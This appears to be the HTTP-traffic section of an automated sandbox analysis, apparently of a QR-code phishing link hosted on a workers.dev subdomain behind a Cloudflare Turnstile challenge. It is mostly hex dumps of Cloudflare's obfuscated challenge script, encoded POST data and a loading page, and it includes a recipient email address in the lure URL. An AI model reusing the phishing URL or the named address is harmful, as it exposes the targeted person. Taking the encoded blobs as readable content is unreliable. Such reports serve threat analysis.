                                      Data Ascii: 7e63window._cf_chl_opt.uaO=false;~function(jo,g5,g6,g7,gb,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,
                                      2024-03-22 14:23:54 UTC1369INData Raw: 7b 27 69 66 69 55 69 27 3a 66 75 6e 63 74 69 6f 6e 28 78 29 7b 72 65 74 75 72 6e 20 78 28 29 7d 7d 2c 68 5b 6a 71 28 31 31 37 33 29 5d 28 6a 71 28 31 38 37 38 29 2c 6a 71 28 32 38 31 30 29 29 29 72 65 74 75 72 6e 20 76 5b 6a 71 28 36 39 32 29 5d 28 6d 29 3b 65 6c 73 65 20 6a 5e 3d 6c 5b 6a 71 28 31 31 38 35 29 5d 28 73 29 7d 29 2c 66 3d 67 35 5b 6a 70 28 31 30 36 30 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 6a 70 28 31 31 38 35 29 5d 28 2b 2b 69 29 29 3b 6b 5b 6a 70 28 34 30 31 35 29 5d 28 53 74 72 69 6e 67 5b 6a 70 28 31 33 34 31 29 5d 28 68 5b 6a 70 28 31 32 32 36 29 5d 28 28 6d 26 32 35 35 2e 37 39 29 2d 6a 2d 69 25 36 35 35 33 35 2c 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 6a 70 28 31
                                      Data Ascii: {'ifiUi':function(x){return x()}},h[jq(1173)](jq(1878),jq(2810)))return v[jq(692)](m);else j^=l[jq(1185)](s)}),f=g5[jp(1060)](f),k=[],i=-1;!isNaN(m=f[jp(1185)](++i));k[jp(4015)](String[jp(1341)](h[jp(1226)]((m&255.79)-j-i%65535,65535)%255)));return k[jp(1
                                      2024-03-22 14:23:54 UTC1369INData Raw: 74 28 32 30 36 34 29 29 2c 73 3d 7b 7d 2c 73 5b 6a 74 28 32 37 34 37 29 5d 3d 66 2c 73 2e 63 63 3d 67 2c 73 5b 6a 74 28 35 36 36 29 5d 3d 6b 2c 78 3d 4a 53 4f 4e 5b 6a 74 28 31 36 38 32 29 5d 28 73 29 2c 42 3d 6a 6d 5b 6a 74 28 33 37 30 37 29 5d 28 78 29 5b 6a 74 28 32 35 36 37 29 5d 28 27 2b 27 2c 6a 74 28 35 34 34 29 29 2c 6e 5b 6a 74 28 33 35 31 36 29 5d 28 27 76 5f 27 2b 67 35 5b 6a 74 28 31 34 33 33 29 5d 5b 6a 74 28 31 33 30 34 29 5d 2b 27 3d 27 2b 42 29 7d 63 61 74 63 68 28 43 29 7b 7d 7d 2c 67 35 5b 6a 6f 28 33 33 36 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c 68 2c 6a 75 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 28 6a 75 3d 6a 6f 2c 69 3d 7b 7d 2c 69 5b 6a 75 28 32 30 33 37 29 5d 3d 6a 75 28 31 31 30 35 29 2c 69 5b 6a 75 28 33 31 36
                                      Data Ascii: t(2064)),s={},s[jt(2747)]=f,s.cc=g,s[jt(566)]=k,x=JSON[jt(1682)](s),B=jm[jt(3707)](x)[jt(2567)]('+',jt(544)),n[jt(3516)]('v_'+g5[jt(1433)][jt(1304)]+'='+B)}catch(C){}},g5[jo(3363)]=function(d,e,f,g,h,ju,i,j,k,l,m){(ju=jo,i={},i[ju(2037)]=ju(1105),i[ju(316
                                      2024-03-22 14:23:54 UTC1369INData Raw: 32 29 5d 3d 6a 6f 28 33 38 35 31 29 2c 67 64 5b 6a 6f 28 32 37 35 32 29 5d 3d 6a 6f 28 32 39 33 36 29 2c 67 64 5b 6a 6f 28 31 36 35 32 29 5d 3d 6a 6f 28 31 35 38 34 29 2c 67 64 5b 6a 6f 28 36 37 39 29 5d 3d 6a 6f 28 33 35 35 30 29 2c 67 64 5b 6a 6f 28 31 39 35 32 29 5d 3d 6a 6f 28 31 38 39 30 29 2c 67 64 5b 6a 6f 28 36 39 39 29 5d 3d 6a 6f 28 31 31 31 33 29 2c 67 64 5b 6a 6f 28 39 32 31 29 5d 3d 6a 6f 28 32 36 30 34 29 2c 67 64 5b 6a 6f 28 32 32 37 31 29 5d 3d 6a 6f 28 32 38 32 33 29 2c 67 64 5b 6a 6f 28 32 34 36 35 29 5d 3d 6a 6f 28 31 31 32 39 29 2c 67 64 5b 6a 6f 28 33 32 30 39 29 5d 3d 6a 6f 28 32 34 36 34 29 2c 67 64 5b 6a 6f 28 34 32 36 29 5d 3d 6a 6f 28 33 37 33 35 29 2c 67 64 5b 6a 6f 28 34 30 34 35 29 5d 3d 6a 6f 28 33 34 30 35 29 2c 67 64 5b 6a
                                      Data Ascii: 2)]=jo(3851),gd[jo(2752)]=jo(2936),gd[jo(1652)]=jo(1584),gd[jo(679)]=jo(3550),gd[jo(1952)]=jo(1890),gd[jo(699)]=jo(1113),gd[jo(921)]=jo(2604),gd[jo(2271)]=jo(2823),gd[jo(2465)]=jo(1129),gd[jo(3209)]=jo(2464),gd[jo(426)]=jo(3735),gd[jo(4045)]=jo(3405),gd[j
                                      2024-03-22 14:23:54 UTC1369INData Raw: 32 37 35 32 29 5d 3d 6a 6f 28 31 31 31 37 29 2c 67 65 5b 6a 6f 28 31 36 35 32 29 5d 3d 6a 6f 28 31 36 32 35 29 2c 67 65 5b 6a 6f 28 36 37 39 29 5d 3d 6a 6f 28 33 36 39 39 29 2c 67 65 5b 6a 6f 28 31 39 35 32 29 5d 3d 6a 6f 28 33 34 36 38 29 2c 67 65 5b 6a 6f 28 36 39 39 29 5d 3d 6a 6f 28 33 39 30 39 29 2c 67 65 5b 6a 6f 28 39 32 31 29 5d 3d 6a 6f 28 32 32 36 30 29 2c 67 65 5b 6a 6f 28 32 32 37 31 29 5d 3d 6a 6f 28 33 31 34 38 29 2c 67 65 5b 6a 6f 28 32 34 36 35 29 5d 3d 6a 6f 28 38 32 35 29 2c 67 65 5b 6a 6f 28 33 32 30 39 29 5d 3d 6a 6f 28 36 30 31 29 2c 67 65 5b 6a 6f 28 34 32 36 29 5d 3d 6a 6f 28 33 37 36 35 29 2c 67 65 5b 6a 6f 28 34 30 34 35 29 5d 3d 6a 6f 28 32 37 39 33 29 2c 67 65 5b 6a 6f 28 33 31 30 30 29 5d 3d 6a 6f 28 33 32 33 39 29 2c 67 65 5b
                                      Data Ascii: 2752)]=jo(1117),ge[jo(1652)]=jo(1625),ge[jo(679)]=jo(3699),ge[jo(1952)]=jo(3468),ge[jo(699)]=jo(3909),ge[jo(921)]=jo(2260),ge[jo(2271)]=jo(3148),ge[jo(2465)]=jo(825),ge[jo(3209)]=jo(601),ge[jo(426)]=jo(3765),ge[jo(4045)]=jo(2793),ge[jo(3100)]=jo(3239),ge[
                                      2024-03-22 14:23:54 UTC1369INData Raw: 67 66 5b 6a 6f 28 31 36 35 32 29 5d 3d 6a 6f 28 31 30 32 39 29 2c 67 66 5b 6a 6f 28 36 37 39 29 5d 3d 6a 6f 28 32 39 35 38 29 2c 67 66 5b 6a 6f 28 31 39 35 32 29 5d 3d 6a 6f 28 32 31 34 32 29 2c 67 66 5b 6a 6f 28 36 39 39 29 5d 3d 6a 6f 28 33 35 31 34 29 2c 67 66 5b 6a 6f 28 39 32 31 29 5d 3d 6a 6f 28 37 37 30 29 2c 67 66 5b 6a 6f 28 32 32 37 31 29 5d 3d 6a 6f 28 33 37 35 35 29 2c 67 66 5b 6a 6f 28 32 34 36 35 29 5d 3d 6a 6f 28 35 38 38 29 2c 67 66 5b 6a 6f 28 33 32 30 39 29 5d 3d 6a 6f 28 31 31 39 35 29 2c 67 66 5b 6a 6f 28 34 32 36 29 5d 3d 6a 6f 28 33 32 38 38 29 2c 67 66 5b 6a 6f 28 34 30 34 35 29 5d 3d 6a 6f 28 31 35 34 30 29 2c 67 66 5b 6a 6f 28 33 31 30 30 29 5d 3d 6a 6f 28 31 31 32 31 29 2c 67 66 5b 6a 6f 28 33 36 38 34 29 5d 3d 6a 6f 28 32 33 38
                                      Data Ascii: gf[jo(1652)]=jo(1029),gf[jo(679)]=jo(2958),gf[jo(1952)]=jo(2142),gf[jo(699)]=jo(3514),gf[jo(921)]=jo(770),gf[jo(2271)]=jo(3755),gf[jo(2465)]=jo(588),gf[jo(3209)]=jo(1195),gf[jo(426)]=jo(3288),gf[jo(4045)]=jo(1540),gf[jo(3100)]=jo(1121),gf[jo(3684)]=jo(238
                                      2024-03-22 14:23:54 UTC1369INData Raw: 6f 28 36 37 39 29 5d 3d 6a 6f 28 31 30 30 31 29 2c 67 67 5b 6a 6f 28 31 39 35 32 29 5d 3d 6a 6f 28 31 38 37 33 29 2c 67 67 5b 6a 6f 28 36 39 39 29 5d 3d 6a 6f 28 33 36 30 35 29 2c 67 67 5b 6a 6f 28 39 32 31 29 5d 3d 6a 6f 28 32 36 35 39 29 2c 67 67 5b 6a 6f 28 32 32 37 31 29 5d 3d 6a 6f 28 33 35 34 30 29 2c 67 67 5b 6a 6f 28 32 34 36 35 29 5d 3d 6a 6f 28 33 37 35 37 29 2c 67 67 5b 6a 6f 28 33 32 30 39 29 5d 3d 6a 6f 28 32 33 32 30 29 2c 67 67 5b 6a 6f 28 34 32 36 29 5d 3d 6a 6f 28 38 33 31 29 2c 67 67 5b 6a 6f 28 34 30 34 35 29 5d 3d 6a 6f 28 31 38 36 36 29 2c 67 67 5b 6a 6f 28 33 31 30 30 29 5d 3d 6a 6f 28 32 36 30 37 29 2c 67 67 5b 6a 6f 28 33 36 38 34 29 5d 3d 6a 6f 28 31 30 35 38 29 2c 67 67 5b 6a 6f 28 32 34 30 39 29 5d 3d 6a 6f 28 31 39 31 36 29 2c
                                      Data Ascii: o(679)]=jo(1001),gg[jo(1952)]=jo(1873),gg[jo(699)]=jo(3605),gg[jo(921)]=jo(2659),gg[jo(2271)]=jo(3540),gg[jo(2465)]=jo(3757),gg[jo(3209)]=jo(2320),gg[jo(426)]=jo(831),gg[jo(4045)]=jo(1866),gg[jo(3100)]=jo(2607),gg[jo(3684)]=jo(1058),gg[jo(2409)]=jo(1916),
                                      2024-03-22 14:23:54 UTC1369INData Raw: 68 5b 6a 6f 28 31 39 35 32 29 5d 3d 6a 6f 28 31 39 30 37 29 2c 67 68 5b 6a 6f 28 36 39 39 29 5d 3d 6a 6f 28 31 35 38 37 29 2c 67 68 5b 6a 6f 28 39 32 31 29 5d 3d 6a 6f 28 31 31 33 32 29 2c 67 68 5b 6a 6f 28 32 32 37 31 29 5d 3d 6a 6f 28 34 32 35 29 2c 67 68 5b 6a 6f 28 32 34 36 35 29 5d 3d 6a 6f 28 33 35 36 31 29 2c 67 68 5b 6a 6f 28 33 32 30 39 29 5d 3d 6a 6f 28 31 36 33 31 29 2c 67 68 5b 6a 6f 28 34 32 36 29 5d 3d 6a 6f 28 31 36 34 37 29 2c 67 68 5b 6a 6f 28 34 30 34 35 29 5d 3d 6a 6f 28 32 39 36 31 29 2c 67 68 5b 6a 6f 28 33 31 30 30 29 5d 3d 6a 6f 28 33 37 30 36 29 2c 67 68 5b 6a 6f 28 33 36 38 34 29 5d 3d 6a 6f 28 31 37 34 30 29 2c 67 68 5b 6a 6f 28 32 34 30 39 29 5d 3d 6a 6f 28 32 33 35 33 29 2c 67 68 5b 6a 6f 28 32 33 33 30 29 5d 3d 6a 6f 28 32 36
                                      Data Ascii: h[jo(1952)]=jo(1907),gh[jo(699)]=jo(1587),gh[jo(921)]=jo(1132),gh[jo(2271)]=jo(425),gh[jo(2465)]=jo(3561),gh[jo(3209)]=jo(1631),gh[jo(426)]=jo(1647),gh[jo(4045)]=jo(2961),gh[jo(3100)]=jo(3706),gh[jo(3684)]=jo(1740),gh[jo(2409)]=jo(2353),gh[jo(2330)]=jo(26
                                      2024-03-22 14:23:54 UTC1369INData Raw: 5b 6a 6f 28 36 39 39 29 5d 3d 6a 6f 28 31 30 38 32 29 2c 67 69 5b 6a 6f 28 39 32 31 29 5d 3d 6a 6f 28 33 39 32 34 29 2c 67 69 5b 6a 6f 28 32 32 37 31 29 5d 3d 6a 6f 28 31 34 30 35 29 2c 67 69 5b 6a 6f 28 32 34 36 35 29 5d 3d 6a 6f 28 32 31 34 35 29 2c 67 69 5b 6a 6f 28 33 32 30 39 29 5d 3d 6a 6f 28 32 30 37 36 29 2c 67 69 5b 6a 6f 28 34 32 36 29 5d 3d 6a 6f 28 33 32 35 37 29 2c 67 69 5b 6a 6f 28 34 30 34 35 29 5d 3d 6a 6f 28 32 30 31 33 29 2c 67 69 5b 6a 6f 28 33 31 30 30 29 5d 3d 6a 6f 28 33 34 37 32 29 2c 67 69 5b 6a 6f 28 33 36 38 34 29 5d 3d 6a 6f 28 31 31 38 30 29 2c 67 69 5b 6a 6f 28 32 34 30 39 29 5d 3d 6a 6f 28 35 39 31 29 2c 67 69 5b 6a 6f 28 32 33 33 30 29 5d 3d 6a 6f 28 33 34 36 31 29 2c 67 69 5b 6a 6f 28 34 33 35 29 5d 3d 6a 6f 28 33 39 33 39
                                      Data Ascii: [jo(699)]=jo(1082),gi[jo(921)]=jo(3924),gi[jo(2271)]=jo(1405),gi[jo(2465)]=jo(2145),gi[jo(3209)]=jo(2076),gi[jo(426)]=jo(3257),gi[jo(4045)]=jo(2013),gi[jo(3100)]=jo(3472),gi[jo(3684)]=jo(1180),gi[jo(2409)]=jo(591),gi[jo(2330)]=jo(3461),gi[jo(435)]=jo(3939
                                      2024-03-22 14:23:54 UTC1369INData Raw: 67 6a 5b 6a 6f 28 39 32 31 29 5d 3d 6a 6f 28 32 37 36 38 29 2c 67 6a 5b 6a 6f 28 32 32 37 31 29 5d 3d 6a 6f 28 32 30 35 30 29 2c 67 6a 5b 6a 6f 28 32 34 36 35 29 5d 3d 6a 6f 28 33 30 37 31 29 2c 67 6a 5b 6a 6f 28 33 32 30 39 29 5d 3d 6a 6f 28 32 37 34 33 29 2c 67 6a 5b 6a 6f 28 34 32 36 29 5d 3d 6a 6f 28 31 36 31 33 29 2c 67 6a 5b 6a 6f 28 34 30 34 35 29 5d 3d 6a 6f 28 33 38 36 35 29 2c 67 6a 5b 6a 6f 28 33 31 30 30 29 5d 3d 6a 6f 28 31 39 36 33 29 2c 67 6a 5b 6a 6f 28 33 36 38 34 29 5d 3d 6a 6f 28 32 36 39 36 29 2c 67 6a 5b 6a 6f 28 32 34 30 39 29 5d 3d 6a 6f 28 31 33 38 34 29 2c 67 6a 5b 6a 6f 28 32 33 33 30 29 5d 3d 6a 6f 28 32 33 34 34 29 2c 67 6a 5b 6a 6f 28 34 33 35 29 5d 3d 6a 6f 28 33 35 31 31 29 2c 67 6a 5b 6a 6f 28 32 35 32 35 29 5d 3d 6a 6f 28
                                      Data Ascii: gj[jo(921)]=jo(2768),gj[jo(2271)]=jo(2050),gj[jo(2465)]=jo(3071),gj[jo(3209)]=jo(2743),gj[jo(426)]=jo(1613),gj[jo(4045)]=jo(3865),gj[jo(3100)]=jo(1963),gj[jo(3684)]=jo(2696),gj[jo(2409)]=jo(1384),gj[jo(2330)]=jo(2344),gj[jo(435)]=jo(3511),gj[jo(2525)]=jo(


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.449749104.17.2.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:54 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:54 UTC248INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:54 GMT
                                      Content-Type: image/png
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cache-control: max-age=2629800, public
                                      Server: cloudflare
                                      CF-RAY: 8686d79d1efb437b-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:54 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                      Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                      2024-03-22 14:23:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.449743172.67.132.204433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:55 UTC668OUTGET /favicon.ico HTTP/1.1
                                      Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.dev
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: image
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.com
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:55 UTC583INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:55 GMT
                                      Content-Type: text/html;charset=UTF-8
                                      Content-Length: 3255
                                      Connection: close
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iD1V3BPErNJoWVXb81LRjSFjGGTpipLj234c%2FqLxsc1XH75ys1ilpSmm1Z2%2FtQUJPP12GjtFlHsDRrNmvULFcCpjqo6%2FN8M2rhuCBOW3zVwNceHvuZKneCol4aDKD5eagVyZzWLOGzmJTPIhko2Bn%2FiH7bYnCcJ8CrzxoyqFmAU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8686d7a20ab50cc2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:55 UTC786INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72
                                      Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewpor
                                      2024-03-22 14:23:55 UTC1369INData Raw: 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f
                                      Data Ascii: e UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:none;colo
                                      2024-03-22 14:23:55 UTC1100INData Raw: 74 74 6f 6d 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                                      Data Ascii: ttom:1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{background-color:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.449751104.17.3.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:55 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32 HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      Content-Length: 2754
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      Content-type: application/x-www-form-urlencoded
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      CF-Challenge: 99cb5747b72fd32
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Origin: https://challenges.cloudflare.com
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normal
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:55 UTC2754OUTData Raw: 76 5f 38 36 38 36 64 37 39 36 39 66 66 33 38 63 38 64 3d 72 6c 6d 24 50 24 74 24 70 24 64 24 63 37 68 32 37 68 54 52 68 72 24 56 73 6d 42 68 61 37 45 52 68 4a 4b 68 6e 73 24 34 37 68 6c 24 66 77 49 42 68 7a 68 78 71 4b 68 67 2d 68 61 53 70 68 77 36 30 68 53 4e 68 71 76 6e 68 34 5a 34 67 76 70 75 31 68 73 73 34 7a 68 6a 73 37 31 30 68 68 48 74 68 37 52 37 24 34 63 68 67 6d 43 35 5a 57 24 71 58 50 25 32 62 24 64 6d 68 5a 30 61 49 4e 68 41 72 52 4c 4d 69 32 68 44 33 6c 68 45 68 36 48 74 68 58 69 6d 68 5a 24 6e 6f 7a 74 24 61 78 52 77 44 63 49 5a 67 5a 79 47 68 7a 24 34 4d 68 50 6d 68 6d 4b 55 6d 77 46 73 68 67 4c 42 73 67 71 53 33 4b 57 68 68 78 24 37 46 49 72 33 37 4b 52 47 47 41 30 50 73 46 4e 48 45 6d 73 37 7a 68 24 68 4d 46 69 6d 37 55 24 34 6f 4f 24 55
                                      Data Ascii: v_8686d7969ff38c8d=rlm$P$t$p$d$c7h27hTRhr$VsmBha7ERhJKhns$47hl$fwIBhzhxqKhg-haSphw60hSNhqvnh4Z4gvpu1hss4zhjs710hhHth7R7$4chgmC5ZW$qXP%2b$dmhZ0aINhArRLMi2hD3lhEh6HthXimhZ$nozt$axRwDcIZgZyGhz$4MhPmhmKUmwFshgLBsgqS3KWhhx$7FIr37KRGGA0PsFNHEms7zh$hMFim7U$4oO$U
                                      2024-03-22 14:23:55 UTC691INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:55 GMT
                                      Content-Type: text/plain; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cf-chl-gen: IKShGjfxq+cWAAN0eocD2+NOvbyd8gVjHli6GmEyihZIQZS4Q+Ub7rbcZJB4W4oPUDVPqqEaKO7dIangwk9LzcxwbdakdNJ8bv4ApkoVDcEIZD6O2+G61UQ6u4cG4gyUZ39HqJ/fbZNgWHoN8J3WB9hMCiGioUQSdtnxHEM68tXQt54dz4RuZ6VqXODIEdP1MV0K4iWcVds4jIt3oN/Rf/DKq9LvcBV0jWHG70zHh4tV4cLgxjqmY0Oy/GL6PZ61O7ozoeV2gCCdo/0OWdPAeePhldJKG35qhpOeOKctJAgGIgccJpZpKYgJxR/7K2wNWX5vfedRTT6aH024xH+oTBN+V16/Vp/L79uQ18kmMYC3B13/lUCWVka63nfDWTigWROT2jaV6+HhrLbNVspHgqhPILM6ouwiY2J5lZ1rAi8=$qMI0ev3thqRwR4KdCISeUg==
                                      Server: cloudflare
                                      CF-RAY: 8686d7a31de7435b-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:55 UTC678INData Raw: 37 63 66 66 0d 0a 67 30 39 56 61 57 79 4f 63 5a 6c 79 61 33 47 62 65 32 53 65 67 36 52 6c 63 31 79 6e 6c 56 39 6e 6a 36 31 77 6b 59 69 68 63 4b 47 47 70 35 6d 6c 6a 4b 65 4f 74 70 65 79 64 37 2b 69 6e 33 79 42 6d 35 69 39 79 72 53 65 75 70 7a 42 79 4b 2b 63 78 49 32 56 79 34 6e 4e 72 38 66 59 76 49 2b 35 30 72 47 54 76 64 58 61 31 37 44 65 33 64 61 37 32 36 66 5a 75 74 2b 72 33 4b 54 66 36 76 43 30 34 75 33 4a 7a 4e 72 57 76 4e 54 66 74 38 72 53 32 64 2f 45 2f 72 37 33 39 39 6e 71 34 2b 41 49 7a 77 2f 67 43 74 49 42 46 4f 41 4d 44 39 6e 51 31 52 54 57 46 52 48 78 41 39 2f 38 45 78 77 46 42 75 41 72 41 2b 45 65 4c 52 77 52 42 43 34 44 42 65 77 74 4d 42 6b 47 46 77 51 4d 43 42 6f 39 45 78 77 53 52 42 67 54 4e 45 45 61 41 42 6b 35 49 45 34 5a 4c 30 45 5a 4a
                                      Data Ascii: 7cffg09VaWyOcZlya3Gbe2Seg6Rlc1ynlV9nj61wkYihcKGGp5mljKeOtpeyd7+in3yBm5i9yrSeupzByK+cxI2Vy4nNr8fYvI+50rGTvdXa17De3da726fZut+r3KTf6vC04u3JzNrWvNTft8rS2d/E/r7399nq4+AIzw/gCtIBFOAMD9nQ1RTWFRHxA9/8ExwFBuArA+EeLRwRBC4DBewtMBkGFwQMCBo9ExwSRBgTNEEaABk5IE4ZL0EZJ
